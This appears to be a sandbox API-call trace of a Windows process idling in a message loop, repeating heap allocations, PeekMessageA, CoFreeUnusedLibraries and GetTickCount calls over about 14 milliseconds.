[0066.526] GetTickCount () returned 0x1d28a [0066.526] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.526] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.526] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.526] GetTickCount () returned 0x1d28a [0066.526] GetTickCount () returned 0x1d28a [0066.527] CoFreeUnusedLibraries () [0066.527] GetTickCount () returned 0x1d28a [0066.527] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.527] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.527] GetTickCount () returned 0x1d28a [0066.527] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.527] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.527] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.527] GetTickCount () returned 0x1d28a [0066.527] GetTickCount () returned 0x1d28a [0066.527] CoFreeUnusedLibraries () [0066.527] GetTickCount () returned 0x1d28a [0066.527] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.527] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.527] GetTickCount () returned 0x1d28a [0066.527] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.527] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.527] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.527] GetTickCount () returned 0x1d28a [0066.527] GetTickCount () returned 0x1d28a [0066.527] CoFreeUnusedLibraries () [0066.527] GetTickCount () returned 0x1d28a [0066.527] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.527] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.527] GetTickCount () returned 0x1d28a [0066.528] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.528] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.528] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.528] GetTickCount () returned 0x1d28a [0066.528] GetTickCount () returned 0x1d28a [0066.528] CoFreeUnusedLibraries () [0066.528] GetTickCount () returned 0x1d28a [0066.528] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.528] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.528] GetTickCount () returned 0x1d28a [0066.528] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.528] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.528] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.528] GetTickCount () returned 0x1d28a [0066.528] GetTickCount () returned 0x1d28a [0066.528] CoFreeUnusedLibraries () [0066.528] GetTickCount () returned 0x1d28a [0066.528] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.528] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.528] GetTickCount () returned 0x1d28a [0066.528] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.528] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.528] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.529] GetTickCount () returned 0x1d28a [0066.529] GetTickCount () returned 0x1d28a [0066.529] CoFreeUnusedLibraries () [0066.529] GetTickCount () returned 0x1d28a [0066.529] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.529] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.529] GetTickCount () returned 0x1d28a [0066.529] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.529] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.529] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.529] GetTickCount () returned 0x1d28a [0066.529] GetTickCount () returned 0x1d28a [0066.529] CoFreeUnusedLibraries () [0066.529] GetTickCount () returned 0x1d28a [0066.529] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.529] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.529] GetTickCount () returned 0x1d28a [0066.529] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.529] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.529] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.529] GetTickCount () returned 0x1d28a [0066.529] GetTickCount () returned 0x1d28a [0066.529] CoFreeUnusedLibraries () [0066.529] GetTickCount () returned 0x1d28a [0066.529] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.529] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.529] GetTickCount () returned 0x1d28a [0066.530] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.530] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.530] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.530] GetTickCount () returned 0x1d28a [0066.530] GetTickCount () returned 0x1d28a [0066.530] CoFreeUnusedLibraries () [0066.530] GetTickCount () returned 0x1d28a [0066.530] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.530] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.530] GetTickCount () returned 0x1d28a [0066.530] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.530] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.530] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.530] GetTickCount () returned 0x1d28a [0066.530] GetTickCount () returned 0x1d28a [0066.530] CoFreeUnusedLibraries () [0066.530] GetTickCount () returned 0x1d28a [0066.530] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.530] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.530] GetTickCount () returned 0x1d28a [0066.530] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.531] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.531] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.531] GetTickCount () returned 0x1d28a [0066.531] GetTickCount () returned 0x1d28a [0066.531] CoFreeUnusedLibraries () [0066.531] GetTickCount () returned 0x1d28a [0066.531] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.531] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.531] GetTickCount () returned 0x1d28a [0066.531] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.531] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.531] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.531] GetTickCount () returned 0x1d299 [0066.531] GetTickCount () returned 0x1d299 [0066.531] CoFreeUnusedLibraries () [0066.531] GetTickCount () returned 0x1d299 [0066.531] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.531] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.531] GetTickCount () returned 0x1d299 [0066.532] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.532] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.532] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.532] GetTickCount () returned 0x1d299 [0066.532] GetTickCount () returned 0x1d299 [0066.532] CoFreeUnusedLibraries () [0066.532] GetTickCount () returned 0x1d299 [0066.532] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.532] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.532] GetTickCount () returned 0x1d299 [0066.532] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.532] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.532] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.532] GetTickCount () returned 0x1d299 [0066.532] GetTickCount () returned 0x1d299 [0066.532] CoFreeUnusedLibraries () [0066.532] GetTickCount () returned 0x1d299 [0066.532] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.532] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.532] GetTickCount () returned 0x1d299 [0066.532] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.532] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.533] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.533] GetTickCount () returned 0x1d299 [0066.533] GetTickCount () returned 0x1d299 [0066.533] CoFreeUnusedLibraries () [0066.533] GetTickCount () returned 0x1d299 [0066.533] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.533] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.533] GetTickCount () returned 0x1d299 [0066.533] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.533] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.533] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.533] GetTickCount () returned 0x1d299 [0066.533] GetTickCount () returned 0x1d299 [0066.533] CoFreeUnusedLibraries () [0066.533] GetTickCount () returned 0x1d299 [0066.533] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.533] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.533] GetTickCount () returned 0x1d299 [0066.533] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.533] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.533] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.533] GetTickCount () returned 0x1d299 [0066.533] GetTickCount () returned 0x1d299 [0066.533] CoFreeUnusedLibraries () [0066.533] GetTickCount () returned 0x1d299 [0066.534] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.534] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.534] GetTickCount () returned 0x1d299 [0066.534] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.534] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.534] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.534] GetTickCount () returned 0x1d299 [0066.534] GetTickCount () returned 0x1d299 [0066.534] CoFreeUnusedLibraries () [0066.534] GetTickCount () returned 0x1d299 [0066.534] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.534] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.534] GetTickCount () returned 0x1d299 [0066.534] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.534] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.534] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.534] GetTickCount () returned 0x1d299 [0066.534] GetTickCount () returned 0x1d299 [0066.534] CoFreeUnusedLibraries () [0066.534] GetTickCount () returned 0x1d299 [0066.534] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.534] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.534] GetTickCount () returned 0x1d299 [0066.535] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.535] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.535] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.535] GetTickCount () returned 0x1d299 [0066.535] GetTickCount () returned 0x1d299 [0066.535] CoFreeUnusedLibraries () [0066.535] GetTickCount () returned 0x1d299 [0066.535] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.535] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.535] GetTickCount () returned 0x1d299 [0066.535] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.535] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.535] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.535] GetTickCount () returned 0x1d299 [0066.535] GetTickCount () returned 0x1d299 [0066.535] CoFreeUnusedLibraries () [0066.535] GetTickCount () returned 0x1d299 [0066.535] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.535] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.535] GetTickCount () returned 0x1d299 [0066.535] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.535] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.535] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.535] GetTickCount () returned 0x1d299 [0066.535] GetTickCount () returned 0x1d299 [0066.536] CoFreeUnusedLibraries () [0066.536] GetTickCount () returned 0x1d299 [0066.536] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.536] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.536] GetTickCount () returned 0x1d299 [0066.536] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.536] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.536] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.536] GetTickCount () returned 0x1d299 [0066.536] GetTickCount () returned 0x1d299 [0066.536] CoFreeUnusedLibraries () [0066.536] GetTickCount () returned 0x1d299 [0066.536] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.536] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.536] GetTickCount () returned 0x1d299 [0066.536] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.536] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.536] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.536] GetTickCount () returned 0x1d299 [0066.536] GetTickCount () returned 0x1d299 [0066.536] CoFreeUnusedLibraries () [0066.536] GetTickCount () returned 0x1d299 [0066.536] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.536] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.536] GetTickCount () returned 0x1d299 [0066.537] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.537] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.537] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.537] GetTickCount () returned 0x1d299 [0066.537] GetTickCount () returned 0x1d299 [0066.537] CoFreeUnusedLibraries () [0066.537] GetTickCount () returned 0x1d299 [0066.537] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.537] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.537] GetTickCount () returned 0x1d299 [0066.537] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.537] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.537] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.537] GetTickCount () returned 0x1d299 [0066.537] GetTickCount () returned 0x1d299 [0066.537] CoFreeUnusedLibraries () [0066.537] GetTickCount () returned 0x1d299 [0066.537] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.537] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.537] GetTickCount () returned 0x1d299 [0066.537] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.537] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.538] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.538] GetTickCount () returned 0x1d299 [0066.538] GetTickCount () returned 0x1d299 [0066.538] CoFreeUnusedLibraries () [0066.538] GetTickCount () returned 0x1d299 [0066.538] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.538] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.538] GetTickCount () returned 0x1d299 [0066.538] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.538] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.538] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.538] GetTickCount () returned 0x1d299 [0066.538] GetTickCount () returned 0x1d299 [0066.538] CoFreeUnusedLibraries () [0066.538] GetTickCount () returned 0x1d299 [0066.538] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.538] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.538] GetTickCount () returned 0x1d299 [0066.538] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.538] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.538] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.538] GetTickCount () returned 0x1d299 [0066.538] GetTickCount () returned 0x1d299 [0066.538] CoFreeUnusedLibraries () [0066.538] GetTickCount () returned 0x1d299 [0066.538] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.539] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.539] GetTickCount () returned 0x1d299 [0066.539] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.539] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.539] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.539] GetTickCount () returned 0x1d299 [0066.539] GetTickCount () returned 0x1d299 [0066.539] CoFreeUnusedLibraries () [0066.539] GetTickCount () returned 0x1d299 [0066.539] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.539] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.539] GetTickCount () returned 0x1d299 [0066.539] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.539] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.539] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.539] GetTickCount () returned 0x1d299 [0066.539] GetTickCount () returned 0x1d299 [0066.539] CoFreeUnusedLibraries () [0066.539] GetTickCount () returned 0x1d299 [0066.539] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.539] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.539] GetTickCount () returned 0x1d299 [0066.540] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.540] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.540] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.540] GetTickCount () returned 0x1d299 [0066.540] GetTickCount () returned 0x1d299 [0066.540] CoFreeUnusedLibraries () [0066.540] GetTickCount () returned 0x1d299 [0066.540] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.540] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.540] GetTickCount () returned 0x1d299 [0066.540] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.540] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.540] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.540] GetTickCount () returned 0x1d299 [0066.540] GetTickCount () returned 0x1d299 [0066.540] CoFreeUnusedLibraries () [0066.540] GetTickCount () returned 0x1d299 [0066.540] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.540] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.540] GetTickCount () returned 0x1d299 [0066.540] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.540] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.540] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.540] GetTickCount () returned 0x1d299 [0066.540] GetTickCount () returned 0x1d299 [0066.540] 